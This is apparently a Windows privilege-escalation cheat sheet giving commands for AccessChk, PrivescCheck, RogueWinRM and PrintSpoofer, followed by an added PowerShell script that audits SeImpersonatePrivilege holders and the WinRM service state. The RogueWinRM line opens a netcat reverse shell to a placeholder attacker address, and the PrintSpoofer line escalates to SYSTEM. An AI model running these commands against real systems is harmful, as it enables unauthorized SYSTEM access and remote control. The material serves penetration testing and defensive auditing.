Common Tools

AccessChk

Lists the effective access of users and groups to files, directories, registry keys, global objects and Windows services.

:: Accept the Eula
accesschk /accepteula

:: Query Service Information
accesschk -qlc "ServiceName"

PrivescCheck

PowerShell script that enumerates common privilege escalation vectors on the target system.

# Sets Execution Policies for Windows Computers
# [Bypass] Nothing is Blocked and there are no Warnings or Prompts
Set-ExecutionPolicy Bypass -Scope process -Force

# Import the PowerShell script
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

RogueWinRM

Only possible if the WinRM service is not running.

This is the default on Windows 10 but not on Windows Server 2019.

Local privilege escalation exploit that allows escalating from a service account holding [SeImpersonatePrivilege] to the local SYSTEM account.

RogueWinRM -p "C:\Tools\nc64.exe" -a "-e cmd.exe <ATTACKER_IP> <PORT>"

PrintSpoofer

From LOCAL SERVICE / NETWORK SERVICE to SYSTEM by abusing [SeImpersonatePrivilege]

PrintSpoofer64 -i -c powershell
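Both RogueWinRM and PrintSpoofer above depend on the same precondition, an account holding [SeImpersonatePrivilege], and RogueWinRM additionally needs the WinRM service stopped. The following is an added defender-side audit script (not part of the original page or of either tool): it exports the local security policy with secedit, reports which accounts hold the privilege and flags holders beyond the Windows defaults, and prints the WinRM service state. The temp file path is a constructed assumption; run it from an elevated prompt.

```powershell
# Added example: audit the preconditions of the RogueWinRM / PrintSpoofer notes.
#   1. Which accounts hold SeImpersonatePrivilege ("Impersonate a client after
#      authentication") in the local security policy.
#   2. Whether the WinRM service is running (RogueWinRM requires it stopped).
# Requires an elevated prompt for secedit; produces a report only.

function Get-ImpersonatePrivilegeHolders {
    # secedit exports the local policy as an INF; its [Privilege Rights]
    # section lists each user right with its holders as "*SID" entries.
    $inf = Join-Path $env:TEMP 'secpol-audit.inf'   # constructed temp path
    secedit /export /cfg $inf /quiet | Out-Null
    try {
        $line = Get-Content $inf | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
        if (-not $line) { return @() }
        $entries = ($line -split '=', 2)[1].Trim() -split ','
        foreach ($entry in $entries) {
            $raw = $entry.Trim()
            if ($raw.StartsWith('*')) {
                $sid = New-Object System.Security.Principal.SecurityIdentifier ($raw.Substring(1))
                try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
                catch { $name = '<unresolved>' }
                [pscustomobject]@{ Sid = $sid.Value; Account = $name }
            } else {
                # secedit writes a plain name when it could not resolve a SID
                [pscustomobject]@{ Sid = $null; Account = $raw }
            }
        }
    } finally {
        Remove-Item $inf -ErrorAction SilentlyContinue
    }
}

function Get-WinRmState {
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    if (-not $svc) { return 'NotInstalled' }
    return $svc.Status.ToString()     # 'Running' or 'Stopped'
}

# Default holders: Administrators, SERVICE, LOCAL SERVICE, NETWORK SERVICE.
# Any other holder widens the set of accounts that can reach SYSTEM this way.
$defaultSids = 'S-1-5-32-544', 'S-1-5-6', 'S-1-5-19', 'S-1-5-20'
Get-ImpersonatePrivilegeHolders |
    Select-Object Account, Sid, @{ n = 'NonDefault'; e = { $_.Sid -notin $defaultSids } } |
    Format-Table -AutoSize
"WinRM service state: $(Get-WinRmState)"
```

A stopped WinRM on a Windows 10 host matches the RogueWinRM note above; every account reported as NonDefault is a candidate for removal from the user right.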